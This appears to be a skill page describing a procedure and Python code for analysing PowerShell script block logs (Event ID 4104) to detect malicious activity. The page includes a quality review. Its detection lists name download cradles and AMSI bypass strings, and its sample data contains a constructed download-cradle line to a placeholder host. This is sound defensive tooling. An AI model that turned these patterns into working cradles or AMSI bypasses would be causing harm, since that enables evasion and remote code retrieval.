PowerShell EVTX Script Block Analyzer
Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files, extract and reconstruct ScriptBlockText, apply detection heuristics for encoded commands, download cradl…
SKILL.md
---
name: analyzing-powershell-script-block-logging
description: "Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files to detect obfuscated commands, encoded"
---
# Analyzing PowerShell Script Block Logging
## When to Use
- When investigating security incidents that require analyzing PowerShell script block logging
- When building detection rules or threat hunting queries for PowerShell script block logs
- When SOC analysts need structured procedures for this analysis type
- When validating security monitoring coverage for related attack techniques
## Prerequisites
- Familiarity with security operations concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
## Instructions
1. Install dependencies: `pip install python-evtx lxml`
2. Collect PowerShell Operational logs: `Microsoft-Windows-PowerShell%4Operational.evtx`
3. Parse Event ID 4104 entries using python-evtx to extract ScriptBlockText, ScriptBlockId, and MessageNumber/MessageTotal for multi-part script reconstruction.
4. Apply detection heuristics:
   - Base64-encoded commands (`-EncodedCommand`, `FromBase64String`)
   - Download cradles (`DownloadString`, `DownloadFile`, `Invoke-WebRequest`, `Net.WebClient`)
   - AMSI bypass patterns (`AmsiUtils`, `amsiInitFailed`)
   - Obfuscation indicators (high entropy, tick-mark insertion, string concatenation)
5. Generate a report with reconstructed scripts, risk scores, and MITRE ATT&CK mappings.
```bash
python scripts/agent.py --evtx-file /path/to/PowerShell-Operational.evtx --output ps_analysis.json
```
## Examples
### Detect Encoded Command Execution
```python
import base64

def decode_encoded_command(script_text):
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE), or None if absent."""
    if "-encodedcommand" in script_text.lower():
        encoded = script_text.split()[-1]  # the page's heuristic: the payload is the last token
        return base64.b64decode(encoded).decode("utf-16-le")
    return None
```
### Reconstruct Multi-Block Script
Scripts split across multiple 4104 events share a `ScriptBlockId`. Concatenate blocks ordered by `MessageNumber` to recover the full script.
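As an added example (not part of the original SKILL.md or its `scripts/agent.py`), the following runs steps 3 to 5 of the procedure, multi-block reconstruction included, over constructed 4104 records that stand in for the EventData fields python-evtx would yield; the ATT&CK technique mappings, the point values and the entropy threshold are assumptions, and a block whose part count falls short of `MessageTotal` is reported as incomplete rather than silently analyzed as whole.

```python
import base64, math, re
from collections import Counter, defaultdict

# Constructed sample 4104 records as (ScriptBlockId, MessageNumber, MessageTotal, ScriptBlockText); not a real log.
ENCODED = base64.b64encode("Write-Output 'lab test'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ("b1", 2, 2, "$w.DownloadString('http://example.invalid/p')"),  # part 2 logged before part 1
    ("b1", 1, 2, "$w = New-Object Net.WebClient; "),
    ("b2", 1, 1, "powershell -EncodedCommand " + ENCODED),
    ("b3", 1, 1, "Wr`ite-Output ('a' + 'b')"),  # tick insertion and string concatenation
    ("b4", 1, 3, "Get-ChildItem C:\\Temp"),  # parts 2 and 3 never logged
]
HEURISTICS = [  # (name, pattern, points, assumed ATT&CK technique) for the heuristics in step 4
    ("encoded_command", re.compile(r"-EncodedCommand\b|FromBase64String", re.I), 40, "T1027"),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I), 30, "T1105"),
    ("amsi_bypass", re.compile(r"AmsiUtils|amsiInitFailed", re.I), 50, "T1562.001"),
    ("tick_insertion", re.compile(r"[A-Za-z]`[A-Za-z]"), 20, "T1027"),
    ("string_concat", re.compile(r"'[^']*'\s*\+\s*'[^']*'"), 10, "T1027"),
]
ENCODED_ARG = re.compile(r"-EncodedCommand\s+([A-Za-z0-9+/=]+)", re.I)
def shannon_entropy(text):  # bits per character; long random-looking blobs score high
    n = len(text) or 1
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())

def reconstruct_scripts(events):
    """Join blocks sharing a ScriptBlockId in MessageNumber order -> {id: (text, complete)}."""
    parts = defaultdict(list)
    for sbid, num, total, text in events:
        parts[sbid].append((num, total, text))
    return {sbid: ("".join(t for _, _, t in sorted(chunks)), len(chunks) == chunks[0][1])
            for sbid, chunks in parts.items()}

def analyze_script(text):
    """Apply the step 4 heuristics, decode any -EncodedCommand payload, return a scored finding."""
    hits, score, techniques, decoded = [], 0, set(), None
    for name, rx, points, tech in HEURISTICS:
        if rx.search(text):
            hits.append(name); score += points; techniques.add(tech)
    if (m := ENCODED_ARG.search(text)):
        try:  # PowerShell base64-encodes the UTF-16LE form of the command
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            hits.append("undecodable_payload")  # keep the hit, report that decoding failed
    if shannon_entropy(text) > 5.0:  # assumed threshold
        hits.append("high_entropy"); score += 15; techniques.add("T1027")
    return {"hits": hits, "score": min(score, 100), "techniques": sorted(techniques), "decoded": decoded}

def build_report(events):  # one structured entry per reconstructed block; incomplete scripts are flagged
    return [dict(script_block_id=s, complete=c, script=t, **analyze_script(t))
            for s, (t, c) in reconstruct_scripts(events).items()]
```

`build_report(SAMPLE_EVENTS)` is the list that `json.dumps` would turn into the `ps_analysis.json` style output; in real use the tuples come from the EventData of each 4104 record yielded by python-evtx.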
REQUIRED CONTEXT
- EVTX file containing PowerShell Operational logs (Event ID 4104)
TOOLS REQUIRED
- python-evtx
- lxml
EXPECTED OUTPUT
- Format: structured_report
- Constraints
  - include reconstructed scripts
  - include risk scores
  - include MITRE ATT&CK mappings
  - output JSON via CLI example
EXAMPLES
Includes two examples: one Python snippet for detecting encoded commands and one description of multi-block script reconstruction.
CAVEATS
- Dependencies
  - Python 3.8+ with python-evtx and lxml
  - PowerShell Operational EVTX file
  - Familiarity with security operations concepts
- Missing context
  - Exact output schema or format for the ps_analysis.json report
  - Full source or specification for scripts/agent.py
- Ambiguities
  - Description is truncated mid-sentence: 'to detect obfuscated commands, encoded'
QUALITY
- OVERALL: 0.72
- CLARITY: 0.75
- SPECIFICITY: 0.80
- REUSABILITY: 0.70
- COMPLETENESS: 0.65
IMPROVEMENT SUGGESTIONS
- Complete the truncated description sentence in the YAML header.
- Add explicit success criteria for the generated report (e.g., required fields, risk score scale).